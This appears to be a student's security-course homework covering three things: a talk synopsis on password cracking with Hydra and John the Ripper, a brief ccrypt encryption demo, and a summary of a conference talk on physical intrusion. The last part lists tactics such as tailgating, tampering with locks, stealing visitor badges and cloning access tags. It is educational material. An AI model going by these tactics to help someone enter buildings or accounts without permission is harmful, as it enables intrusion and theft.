The modern algorithms are based on are complex mathematics. They are so complex that even if you know it, it is almost impossible to break it. The security is therefore relied on the strength of the key used, that is why it’s easier to try and break the key, and gain access that way.

---

Exercise A

a) Presentation material. Write down synopsis and key points of your presentation. Add some references. If you're using slides, feel free to link the PDF here in addition to synopsis.

All passwords can be cracked, all you need is time.

This is a short summary of my online presentation.

Passwords are becoming more complex with the increased use of password managers and automated password generation tools. The old wordlist used are hardly working anymore, so I need to be smarter when cracking passwords. In this presentation I will talk about a few password cracking programs, wordlists and what can you do if a wordlist is not enough.

First, I will talk about Hydra, a login cracker that support 35 protocols, used mostly on online applications like: SSH, FTP and MYSSQL. Cracking passwords over the web is always very loud, so if the target (NOTE: only attack targets you have permission to attack!) has active monitoring of any kind you will get noticed.

After this I will look at John The Ripper and how to crack a .rar file hash, that has a password that is not in a wordlist. For this I use incremental mode, this could take months, so I need to take a look at the config file and see if I can do something to speed it up.

At the end you will have basic knowledge about password cracking, how to do it a bit smarter and understand what makes a good password and why.

Hydra
John the Ripper
What Is a Brute Force Attack?
Brute Force Attack: Definition and Examples
Brute Force - CheatSheet

---

Exercise B

b) Encrypt and decrypt a message using a tool of your choosing. Comment on the tool and the process.

Ccrypt

Ccrypt is used to encryp and decryt files and folders. It does not provide data integrity, so it will not detect if the encryption was modified after encryption. Encrypted files get .cpt suffix. The program is very easy to use and works good, ease of use is not always evident, especially when it comes to linux programs and using terminal commands.

I encrypted a textfile using the command:
$ ccencrypt test.txt
After this I gave a password and it was encrypted

For decryption I use
$ ccdecrypt test.txt
Just gave the password and it's open.

---

H6, Free ticket

---

Exercise Z

z) Read (or watch or listen) and summarize (This subtask z does not require tests with a computer. Some bullets per article is enough for your summary, feel free to write more if you like) A two security conference presentations from different conferences. (This is about 1-2 hours [total] of video for typical conferences) Homework h6 z), terokarvinen.com

I'm in your office - Bypassing access control without social engineering - Antti Virtanen

https://www.youtube.com/watch?v=jW5XebI1PMg

Antti Virtanen talks about how to get into buildings without social engineering, damaging property or leaving evidence of the visit.

The target should always be reckoned in full beforehand, you don’t want to go in from a door and have no clue what’s on the other side of it.
Things to consider in the preparation phase:
- Where are all the doors and windows?
- What type of access control system and locks are used?
- Who has access to different parts of the building?
- Where are the valuable assets you are after?
- Is there an alarm system, is it on a set timetable?
- Do the employees ask for id cards or could you just walk in tailing someone else?
- What tools could you need?

How to get access?
- Just walk in as you belong there, dress like the employees, walk after someone else who opens the door or try doors that look like they are closed, they could be unlocked.
Remember: If you use props, like a fake id card, you can’t say "sorry, I think I walk in by accident"
- Bypass the door, use a window, or climb over the fence
- Pick or use other methods to bypass the lock
- Tamper with the lock so that it does not lock, that way you can get access at a different time. Works well on side doors that are not used often
- Steal visitor badges from the front desk, if they are left unsupervised

What about digital access control?
Even the digital access control in new buildings is often not encrypted, authenticated or signed. This leads to many different ways to take advantage of the system. Access tags are easy to clone and there are a lot of different tag readers on the market.